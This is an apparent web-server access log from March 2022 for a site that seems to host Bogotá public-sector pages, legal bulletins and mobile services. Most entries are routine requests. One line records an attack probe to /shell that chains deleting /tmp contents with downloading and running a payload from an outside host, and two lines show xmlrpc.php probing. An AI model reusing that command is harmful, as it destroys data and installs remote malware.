190.26.51.190 - - [27/Mar/2022:10:00:45 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 304 -
190.26.51.190 - - [27/Mar/2022:10:00:45 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 304 -
190.26.51.190 - - [27/Mar/2022:10:00:45 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
190.26.51.190 - - [27/Mar/2022:10:00:50 -0500] "POST /sipse/faces/autenticacion.xhtml;jsessionid=FxQre0L5DK4k0si1CBddEYZM.undefined HTTP/1.1" 200 2216
190.26.51.190 - - [27/Mar/2022:10:00:51 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.26.51.190 - - [27/Mar/2022:10:00:52 -0500] "POST /sipse/faces/autenticacion.xhtml;jsessionid=FxQre0L5DK4k0si1CBddEYZM.undefined HTTP/1.1" 200 16262
190.26.51.190 - - [27/Mar/2022:10:00:52 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 304 -
190.26.51.190 - - [27/Mar/2022:10:00:52 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.26.51.190 - - [27/Mar/2022:10:00:52 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.26.51.190 - - [27/Mar/2022:10:00:52 -0500] "GET /sipse/js/jquery.min.js HTTP/1.1" 304 -
190.26.51.190 - - [27/Mar/2022:10:00:52 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.26.51.190 - - [27/Mar/2022:10:00:52 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.26.51.190 - - [27/Mar/2022:10:00:52 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.26.51.190 - - [27/Mar/2022:10:00:52 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.26.51.190 - - [27/Mar/2022:10:00:53 -0500] "GET /sipse/imagenes/logoAplicacion.jpg HTTP/1.1" 304 -
190.26.51.190 - - [27/Mar/2022:10:00:53 -0500] "GET /sipse/imagenes/cargando.gif HTTP/1.1" 200 36959
190.26.51.190 - - [27/Mar/2022:10:00:53 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
190.26.51.190 - - [27/Mar/2022:10:00:55 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
190.26.51.190 - - [27/Mar/2022:10:00:55 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 2658
190.26.51.190 - - [27/Mar/2022:10:00:56 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 60649
190.26.51.190 - - [27/Mar/2022:10:00:57 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.26.51.190 - - [27/Mar/2022:10:00:57 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.26.51.190 - - [27/Mar/2022:10:00:57 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.26.51.190 - - [27/Mar/2022:10:00:57 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.26.51.190 - - [27/Mar/2022:10:00:57 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1448
216.245.221.92 - - [27/Mar/2022:10:02:20 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [27/Mar/2022:10:02:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 106020
172.22.2.4 - - [27/Mar/2022:10:01:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [27/Mar/2022:10:02:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61416
66.249.73.127 - - [27/Mar/2022:10:04:21 -0500] "-" 408 -
186.102.43.93 - - [27/Mar/2022:10:06:26 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
186.102.43.93 - - [27/Mar/2022:10:06:26 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 381
186.102.43.93 - - [27/Mar/2022:10:06:28 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
186.102.43.93 - - [27/Mar/2022:10:06:28 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 381
186.102.43.93 - - [27/Mar/2022:10:06:31 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
186.102.43.93 - - [27/Mar/2022:10:06:31 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 381
186.102.43.93 - - [27/Mar/2022:10:06:34 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
186.102.43.93 - - [27/Mar/2022:10:06:35 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 381
186.102.43.93 - - [27/Mar/2022:10:06:38 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
186.102.43.93 - - [27/Mar/2022:10:06:39 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 381
186.102.43.93 - - [27/Mar/2022:10:06:52 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19AbAsJzcBBztuGEtJ0g0hJSSl3/RrRNodP5mj8ohEGv/lkMHOjnPmKecrV9MO5fMVWOKPJ4p81IoKIgBspnD9Stq3dI8CDFZaSx0Q/b9HITNIBeVew2BFJe/c4wZo5p5VkI1agD9QkfgzweeGZRQu1lGgcjSr3wnJrGhY9N6vJpFVLXBP/U77mcSZBcJcjP9J/bXQp+GZX5WFIGGvJLfk0Ebna168Ri4Al5tcXdWiImCH57p6H5IrRsUyBPAIzx7430kELEwWEwA==&u=U2FsdGVkX1+M8pJezsxA6tDzCFVpZRCqD3MgI13fGmINjZGqCrU6J9yyQwuEw85S&y=U2FsdGVkX19/4bs2C1FUozqIMa+8VkldG4swvKIpKhLs2wALEJDfiuKy3s7MvBe/ HTTP/1.1" 200 25
186.102.43.93 - - [27/Mar/2022:10:06:52 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18l/caRKxaBeAFxqQ92n+yQC/jktDl436TRAQzmjJkjWCl4nj77ycm+ZrVQAhwAyqcNbCw4Y2+W5hWYUPLtDGxRAhI/qqdfRIhKSYps0frsyGrhl6UgSPLRX4TDXe0rMzSiXNkZZ/kvV7mvL7n8vTZnX/EbWQWwvMc2dmoKl5ycFJ32SxtyhsxfMoMI0AhzNG+rkjr8EG/Fg3eXbBTBaF1vFyfdyeRI6Kb3w0gVJ/EMC6re3qKtJrtqEo1fiDHDqDZSNR417is1OIiXFqxmpU0ARAb0QNIgxVMoBUdGsUhzGY+ox/rSN4CCab1IlNq4Yp07RhG9vjT7rl/JTGtbWaZq6qvIHpXV1eCQ599s6mAAN2eug3q8xwoFZeXSsihVgBSAvSxuXRwpiOFWPfcqF0j69UwYwFQvc4PBNufdbiDkLO90Z8HJH0khgsy8uhqOuEwO74oczw9Q9Ok/aQrkjJds8PdJiJEpm9q6twI9EngmaxhHFzLjt0Fux4dYh816ScskhxDXNlK1GOEhYc1cUrjtu668QJ+s3coBbWnbSJZ8KuNYsAinICW4gTgeeDfti6769hRoFSPFY740pHpRasyfMA2lfN+uQUUrHGUFALcOCzPWD6A8qS7+nEaK0RmcugSsGwDI8gqp1lnCDeuLfokZwgI3Qs68aFDcgQJol0++du2I9ME+fKmrBUp4hvX6yGXuLGxFaoRfNPmgQlg2UO8OnRsyiroxfzEkdMR15Au4/1SNI66ZxsOSgbMajbZCkhvuR+Y6pYi1ZgoRnjyLUnwXLYQINA3x9ecgdLN53sgyKHlz77ippNy9MN9N+LePH6e5OAL2zKNEg86F7071YFUAmI5fuK0uLvewXjbS3RdZi3I1jQ/knNeD1icPEH4Y2SdbLK1w5yZeM8iVhNPI4FJIzA/fLf987rYKiq+V/a2/IzhFTiHSQUT78ucvS8N/+tFIonV5k0wd4vXe9HnWWxX975oIAI9w53kLjE5ZXyg3bDCXzJSr6M2k/+QlOJ3JrzJc0T24q8yU2hS1LhsTekLtt6tHNnzprI1jRaYpq6nHTTOynxZ7jCV2pD1KEOp8YA9a1drsXxxxWC9/+gytTe/+gxaxKIPNwfGwkqbN8wNtIMkqAvUwWr44iNjln60wWnGMpscs5rbsZe62+2bx1eDbxlcJlvV9VCa0edQduhbkeMSMYsE+rkMKHpr/BQRTVV6YIZlLC3wyeVIahfIZebdTDFpjsOZpqw8JxLhskerbXTZAZeCA4QZvUCw6UDp7IwlIVr7RuMvepwWHite+sdR6jIvYSF0kkztI3TofCWcSiBiQS0JkxN5rUPrC5PRFUKHPDMaLBnhjbCLSIZABab4ahNKNk5gwkkr+sjv4docdu9fV1tqJ2hHHw3VihCgTr0YsLNZ+jaFhQ5mVIo0d+WYX6lch8PhbWZdGyVkKC/Ochcqf6lyXlnHp85Lgnn9WK1Yz1Me4p/YYN/fpuiTnFXKVKgcOWALekatpNEVZHPh8v0PdsFywGA90MAa4x3+M8h9tQscxk9vE/UXKYbgRA8ZegEeWIWBcP42Oj+Qk2hBq99KIF0yx955uvd3nz94+b8qRkFeB81nVnC4wpM+8nAqToEFzexIxqUVoVQMDQPFTICt0zxcDE1sg8WZKWPnGl56zXyNPNI4znDCTulrH3+rJnwAj+vUBjRO3sNEOyfa/1L802+QWSGquHxEpaDlWFmT6tti4WOgMT9KW4BTPjEKoe8o71ZYqadV8Ebfaz8Iz+0EhxMMTMNvjwYo7ezRyFr67xt6dxml4BQ==&u=U2FsdGVkX1+M8pJezsxA6tDzCFVpZRCqD3MgI13fGmINjZGqCrU6J9yyQwuEw85S&y=U2FsdGVkX19/4bs2C1FUozqIMa+8VkldG4swvKIpKhLs2wALEJDfiuKy3s7MvBe/ HTTP/1.1" 200 25
186.102.43.93 - - [27/Mar/2022:10:06:52 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/G5UO1TuP3XPgPOw1OuM54Kf+rwfoXRGBOBOxAYLKFwhKvx/jJr9tcsgqwEGNUssWKTIivSuWgQsnHaBtjDLySWnyZrm5Vl/rIZWqZWFL1ZCjMbGQ3ZlfsvL/dp8liwiKSvZsadC0Adv5Lis8rxsP6PP97d3krb48=&u=U2FsdGVkX1+M8pJezsxA6tDzCFVpZRCqD3MgI13fGmINjZGqCrU6J9yyQwuEw85S&y=U2FsdGVkX19/4bs2C1FUozqIMa+8VkldG4swvKIpKhLs2wALEJDfiuKy3s7MvBe/ HTTP/1.1" 200 25
186.102.43.93 - - [27/Mar/2022:10:06:53 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18ewFTLcBdnI5EcbD3WCsMNBtcgOuW0h+R8i1q5Y9sQr5UXPV2R94t+VYAc3W0pCGeRBpU5misMMNYjFol37I3i92mwwoaWl6jKCxKspmj6NTBRN2WyqXYlvv178hYhaydeRhtK/L2WzZ6HkzgGAjL/nBgtiBJF9RI=&u=U2FsdGVkX1+M8pJezsxA6tDzCFVpZRCqD3MgI13fGmINjZGqCrU6J9yyQwuEw85S&y=U2FsdGVkX19/4bs2C1FUozqIMa+8VkldG4swvKIpKhLs2wALEJDfiuKy3s7MvBe/ HTTP/1.1" 200 25
186.102.43.93 - - [27/Mar/2022:10:06:53 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1856BhSAmKF5nUp7TJcqfjs6xyFvdsdzFVIUPIfwE2+crhAGN6lGADL0+aPJnINa3FFghEf57Z/G7YzIFNB328cUpTVn+NjZ5LAq2TR+7OH2cZG0vv7bTfcgwu94Fw3buMPKDRK72UJWI/rYRWpctFEVJkQnyabfkk=&u=U2FsdGVkX1+M8pJezsxA6tDzCFVpZRCqD3MgI13fGmINjZGqCrU6J9yyQwuEw85S&y=U2FsdGVkX19/4bs2C1FUozqIMa+8VkldG4swvKIpKhLs2wALEJDfiuKy3s7MvBe/ HTTP/1.1" 200 25
186.102.43.93 - - [27/Mar/2022:10:06:53 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18mOa2403Pv5aPKicGX+42xNzB7oCca8vCwvrYhowWMZTeasNoDne8Lc836wBSr2EUwEVKludgiOSmCqDE6AiEwZepPoGkqrNt3bMPm2vK3NeZYfZDaMxseCc48RFsxSqbNJg0ab6j3VoDOrOgHkdeeLQIDvTLDg2By/fZLcgbgOZwNS9MSiPTD&u=U2FsdGVkX1+M8pJezsxA6tDzCFVpZRCqD3MgI13fGmINjZGqCrU6J9yyQwuEw85S&y=U2FsdGVkX19/4bs2C1FUozqIMa+8VkldG4swvKIpKhLs2wALEJDfiuKy3s7MvBe/ HTTP/1.1" 200 25
201.233.189.216 - - [27/Mar/2022:10:06:53 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
186.102.43.93 - - [27/Mar/2022:10:06:53 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18vpV+sF3L3J5QWLkSpGT0J+Yr1JWS5T3/zFj34/zaw86V9THwghSj5WzGPkAqaGOaw9wawQOng2UeXvMV9JP1OKiIaohjqCLBgGUU6YaZKAy/DvN1pVYzrcx+RyocK/M3sW/2hoOj8AEJ0lfcck4+RV4pVXIwoxrTmYUMf8KhZZTEQIQyoT9lK0wWQgKStvh9s7yqp/z+GPg==&u=U2FsdGVkX1+M8pJezsxA6tDzCFVpZRCqD3MgI13fGmINjZGqCrU6J9yyQwuEw85S&y=U2FsdGVkX19/4bs2C1FUozqIMa+8VkldG4swvKIpKhLs2wALEJDfiuKy3s7MvBe/ HTTP/1.1" 200 25
186.102.43.93 - - [27/Mar/2022:10:06:54 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX196M0DAz08889Z866E1MyQLqGuVg10Xe/JHVytJqWhVMP2ElI62gqheBvaeE/CjDcJCuG+Oo7kI/QJ6O+D3RCh+sd1va3JetQy+O23xolUXX0Qgcj0ZcKGIfzVfz0SnP2Bu/K25n0P/gLLm3MefE/5aAY9BSHwPFw/nwwAl1qzU2tVdmY33DMV2&u=U2FsdGVkX1+M8pJezsxA6tDzCFVpZRCqD3MgI13fGmINjZGqCrU6J9yyQwuEw85S&y=U2FsdGVkX19/4bs2C1FUozqIMa+8VkldG4swvKIpKhLs2wALEJDfiuKy3s7MvBe/ HTTP/1.1" 200 25
186.102.43.93 - - [27/Mar/2022:10:06:54 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/DWC6FwL8OI3cxlsYp+/RNWpBRo91yvOnWcPrEAs2Y4JWDQPEW+EXxi5jQ18GT0rdcUMxQvvoLcYTzqVSS6+eC1QsK9x7AQp4E8GjKJlwPaavTsepwv/Ixg9FRBw3RsI3hcF5x6s98SO/k8710fYr09t7oVk5Ho0eGTK+WNVfhkN/qkry0OAx8q7q1IK6MoUCLuB1t00gBQg==&u=U2FsdGVkX1+M8pJezsxA6tDzCFVpZRCqD3MgI13fGmINjZGqCrU6J9yyQwuEw85S&y=U2FsdGVkX19/4bs2C1FUozqIMa+8VkldG4swvKIpKhLs2wALEJDfiuKy3s7MvBe/ HTTP/1.1" 200 25
186.102.43.93 - - [27/Mar/2022:10:06:54 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/jmvX4yGylFyH6xzNurZFH+WlCmzg1hOZ7lvPS0pc9gQQjbcUmsviIMaip8Dlv4VWnH/gc4XOVOOigzXCR6KQ+jt3Pu7rjmFq+mdWLZwZrK01mtZ1tNXcjepNtOO7K99vnTM+DCD7dwUtz0bSL1AVKDRHSDUblqaRhsgB8veiY4UydUs5RkgoG&u=U2FsdGVkX1+M8pJezsxA6tDzCFVpZRCqD3MgI13fGmINjZGqCrU6J9yyQwuEw85S&y=U2FsdGVkX19/4bs2C1FUozqIMa+8VkldG4swvKIpKhLs2wALEJDfiuKy3s7MvBe/ HTTP/1.1" 200 25
186.102.43.93 - - [27/Mar/2022:10:06:54 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18fiPpyweALq/A0Mlyz0udqrV0cr183VQgUNAlieu8MyMqfjJI+ydtkgk1raTbPEvervWB2BCBVBbb/lh8Dux4D8ilDh1onNNHc8WtkUzUX3mPx0ggWKvVFHED7TB6DUZKXPhF2Fb9OAIFttpuGAa4sPigVeNuiVr4Rd1e8ZQZ8AQ825CeXRtnJuhIttF4XXNRKSi2XOqu28w==&u=U2FsdGVkX1+M8pJezsxA6tDzCFVpZRCqD3MgI13fGmINjZGqCrU6J9yyQwuEw85S&y=U2FsdGVkX19/4bs2C1FUozqIMa+8VkldG4swvKIpKhLs2wALEJDfiuKy3s7MvBe/ HTTP/1.1" 200 25
186.102.43.93 - - [27/Mar/2022:10:06:54 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19yf/KhMAwlStDayOXBNAnYeJqkuIIbBmcgmSZKT1cIRjRfA/So71CAlT44dp1dQy6VdTly5uktjGguvPl23Uy6M0QEdYciofVv65TBQO2qQpqWctOrxU4Ld002pxFntfxfzaLAkON6H+KXTj0TWM+EmXwB7sY5zq641bKnm8PfLGTSb6CfxNuc&u=U2FsdGVkX1+M8pJezsxA6tDzCFVpZRCqD3MgI13fGmINjZGqCrU6J9yyQwuEw85S&y=U2FsdGVkX19/4bs2C1FUozqIMa+8VkldG4swvKIpKhLs2wALEJDfiuKy3s7MvBe/ HTTP/1.1" 200 25
186.102.43.93 - - [27/Mar/2022:10:06:54 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/jvCFuT+2Y6LyBGJVIDLhyh+qQkIi54R7FlkxjJan79wTX3tbSFMu8FlnLeMLMygbmVsC+euRnSLSHrgiDx1GouAnHXd8ZuvK1bz719bM2/2EfZTkuZCXsrYyll7ZI+Ipqd7pRf+zfGHSHVlBqmTUmqt2kUhV0JGTKpt72CHTLZzzvKYeI49HTacR9oWVROeimg4wtH5ZpWw==&u=U2FsdGVkX1+M8pJezsxA6tDzCFVpZRCqD3MgI13fGmINjZGqCrU6J9yyQwuEw85S&y=U2FsdGVkX19/4bs2C1FUozqIMa+8VkldG4swvKIpKhLs2wALEJDfiuKy3s7MvBe/ HTTP/1.1" 200 25
186.102.43.93 - - [27/Mar/2022:10:06:55 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19uXBbywwuzWiZPRsZJV20ZdOp/1pimyWaDoOvD+vFDGZMx9vCafPFnX6G02+6VK2sgnULmdjHOQ//AENgxzvm1mz8taI3PNLqg8AgqfMQzMTP3iDHffqJCDmndc/JTL0kYJEnFjfg7+O8GZLoidTMP1HXpgAoPUM7rju0mzOsc/20lnoPPb5Wg&u=U2FsdGVkX1+M8pJezsxA6tDzCFVpZRCqD3MgI13fGmINjZGqCrU6J9yyQwuEw85S&y=U2FsdGVkX19/4bs2C1FUozqIMa+8VkldG4swvKIpKhLs2wALEJDfiuKy3s7MvBe/ HTTP/1.1" 200 25
186.102.43.93 - - [27/Mar/2022:10:06:55 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX196wUV8g443sGPJhjLe8r0MKnwhKBfNFBjtFppbcV0dxWFt4G8z4bIbVgB7OxwPulaNdQaxhkx8aCAVHLVhbANxRUWocC4L38t7KqAsq5FNZq3HxVtS4MfP1Soqa72FWijniLs51AuAQKgdJHhezZo5p1iYeZ1M0JrCLJXfPY1A7y65aTrr54QYNBkgw6KcjyCvZL9FTrjYSA==&u=U2FsdGVkX1+M8pJezsxA6tDzCFVpZRCqD3MgI13fGmINjZGqCrU6J9yyQwuEw85S&y=U2FsdGVkX19/4bs2C1FUozqIMa+8VkldG4swvKIpKhLs2wALEJDfiuKy3s7MvBe/ HTTP/1.1" 200 25
186.102.43.93 - - [27/Mar/2022:10:06:55 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19npdf3KgZzg0VXe1BHZ2D5dTbo5k2FElfiKlghrMzO8OkcE7J70e7VrmmznMuum9LBeZmtLje1LRJaKM2yHdBKIl4Y/J/eVnmNCLfBDaFc3Kbs4XYy68CExeo4J0Vt4pFhh+lwCxi2xRKnLW1BT5s21sSxA6hLjm3pdbDmqwsaVigkIkcbN820&u=U2FsdGVkX1+M8pJezsxA6tDzCFVpZRCqD3MgI13fGmINjZGqCrU6J9yyQwuEw85S&y=U2FsdGVkX19/4bs2C1FUozqIMa+8VkldG4swvKIpKhLs2wALEJDfiuKy3s7MvBe/ HTTP/1.1" 200 25
216.245.221.92 - - [27/Mar/2022:10:07:20 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/Mar/2022:10:07:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [27/Mar/2022:10:08:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
186.102.8.204 - - [27/Mar/2022:10:10:26 -0500] "-" 408 -
207.46.13.179 - - [27/Mar/2022:10:10:38 -0500] "GET /bla/resoluciones/resoluciones%202021/4864.pdf HTTP/1.1" 200 359627
216.245.221.92 - - [27/Mar/2022:10:12:20 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [27/Mar/2022:10:11:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 106277
172.22.2.4 - - [27/Mar/2022:10:13:16 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9555
172.22.2.4 - - [27/Mar/2022:10:13:17 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
66.249.73.127 - - [27/Mar/2022:10:14:57 -0500] "-" 408 -
172.22.2.4 - - [27/Mar/2022:10:13:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [27/Mar/2022:10:14:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60486
172.22.2.4 - - [27/Mar/2022:10:16:13 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9555
172.22.2.4 - - [27/Mar/2022:10:16:13 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
216.245.221.92 - - [27/Mar/2022:10:17:20 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/Mar/2022:10:16:10 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 63729
65.154.226.166 - - [27/Mar/2022:10:19:44 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
65.154.226.166 - - [27/Mar/2022:10:19:44 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
65.154.226.166 - - [27/Mar/2022:10:19:44 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
49.7.21.74 - - [27/Mar/2022:10:20:12 -0500] "-" 408 -
172.22.2.4 - - [27/Mar/2022:10:19:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [27/Mar/2022:10:21:23 -0500] "GET /BLA/boletinlegal/images/screen_2.png HTTP/1.1" 200 362502
172.22.2.4 - - [27/Mar/2022:10:21:23 -0500] "GET /BLA/boletinlegal/images/screen_3.png HTTP/1.1" 200 210620
172.22.2.4 - - [27/Mar/2022:10:21:23 -0500] "GET /BLA/boletinlegal/images/screen_5.png HTTP/1.1" 200 368876
172.22.2.4 - - [27/Mar/2022:10:21:23 -0500] "GET /BLA/boletinlegal/images/arr_r.jpg HTTP/1.1" 200 1998
172.22.2.4 - - [27/Mar/2022:10:21:33 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
201.245.192.253 - - [27/Mar/2022:10:20:46 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44093
172.22.2.4 - - [27/Mar/2022:10:19:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57542
66.249.73.127 - - [27/Mar/2022:10:21:48 -0500] "-" 408 -
216.245.221.92 - - [27/Mar/2022:10:22:20 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [27/Mar/2022:10:21:36 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42124
201.245.192.253 - - [27/Mar/2022:10:22:08 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 106277
172.22.2.4 - - [27/Mar/2022:10:21:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60932
172.22.2.4 - - [27/Mar/2022:10:22:55 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1308
172.22.2.4 - - [27/Mar/2022:10:24:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
207.46.13.178 - - [27/Mar/2022:10:26:41 -0500] "GET /portaldeninos/wp-content/uploads/2021/11/cronica-mujer-junio-29-junio-ambiente-141x75.png HTTP/1.1" 200 25357
207.46.13.194 - - [27/Mar/2022:10:26:52 -0500] "GET /portaldeninos/wp-content/uploads/2021/11/pieza-relatos-semana-ambiental-bogota-1-junio-768x759.jpg HTTP/1.1" 200 112376
216.245.221.92 - - [27/Mar/2022:10:27:20 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/Mar/2022:10:25:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60932
156.208.71.245 - - [27/Mar/2022:10:29:10 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+ jswl.jdaili.xyz/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
66.249.73.127 - - [27/Mar/2022:10:29:23 -0500] "-" 408 -
40.77.167.46 - - [27/Mar/2022:10:29:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202006/2515.tif HTTP/1.1" 200 134166
172.22.2.4 - - [27/Mar/2022:10:29:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36811
211.57.202.228 - - [27/Mar/2022:10:31:04 -0500] "POST /blog/xmlrpc.php HTTP/1.1" 404 1018
211.57.202.228 - - [27/Mar/2022:10:31:04 -0500] "POST /xmlrpc.php HTTP/1.1" 404 1018
201.245.192.253 - - [27/Mar/2022:10:30:46 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44093
172.22.2.4 - - [27/Mar/2022:10:32:08 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisC-273-11.docx HTTP/1.1" 200 22036
216.245.221.92 - - [27/Mar/2022:10:32:20 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [27/Mar/2022:10:31:36 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42124
172.22.2.4 - - [27/Mar/2022:10:30:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [27/Mar/2022:10:31:43 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 106277
172.22.2.4 - - [27/Mar/2022:10:31:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57044
172.22.2.4 - - [27/Mar/2022:10:32:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
207.46.13.209 - - [27/Mar/2022:10:35:18 -0500] "GET /bla/resoluciones/resoluciones%202021/4884.pdf HTTP/1.1" 200 349312
66.249.73.127 - - [27/Mar/2022:10:36:51 -0500] "-" 408 -
216.245.221.92 - - [27/Mar/2022:10:37:20 -0500] "HEAD / HTTP/1.1" 200 -
49.7.21.74 - - [27/Mar/2022:10:38:13 -0500] "-" 408 -
172.22.2.4 - - [27/Mar/2022:10:36:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [27/Mar/2022:10:37:30 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55877
201.245.192.253 - - [27/Mar/2022:10:40:46 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44093
216.245.221.92 - - [27/Mar/2022:10:42:20 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [27/Mar/2022:10:41:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42124
207.46.13.209 - - [27/Mar/2022:10:42:28 -0500] "GET /bla/resoluciones/resoluciones%202021/2988.pdf HTTP/1.1" 200 380110
173.252.79.20 - - [27/Mar/2022:10:42:28 -0500] "GET /fenomeno-de-la-nina-protagonista-en-la-primera-temporada-de-lluvias-del-2022.html HTTP/1.1" 206 1101
62.231.95.186 - - [27/Mar/2022:10:42:47 -0500] "-" 408 -
66.249.73.127 - - [27/Mar/2022:10:42:48 -0500] "-" 408 -
201.245.192.253 - - [27/Mar/2022:10:42:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 106277
172.22.2.4 - - [27/Mar/2022:10:42:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [27/Mar/2022:10:43:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
